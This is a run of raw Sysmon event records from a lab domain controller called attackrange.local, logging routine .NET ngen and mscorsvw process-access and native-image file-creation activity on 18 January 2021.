13:48:22.576{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.482{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-ED02-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:22.420{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1340-0\UIAutomationClient.dll2021-01-18 13:48:22.420 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.060{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.060{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:22.060{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EC02-00000000A301}4928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A6-6005-EB02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84
d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.982{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.982{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.919{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\58c-0\UIAutomationTypes.dll2021-01-18 13:48:23.919 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.623{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:23.623{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F202-00000000A301}1420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.576{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.576{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.513{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ec8-0\UIAutomationProvider.dll2021-01-18 13:48:23.513 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.435{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.419{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:23.419{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.388{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.373{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.373{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32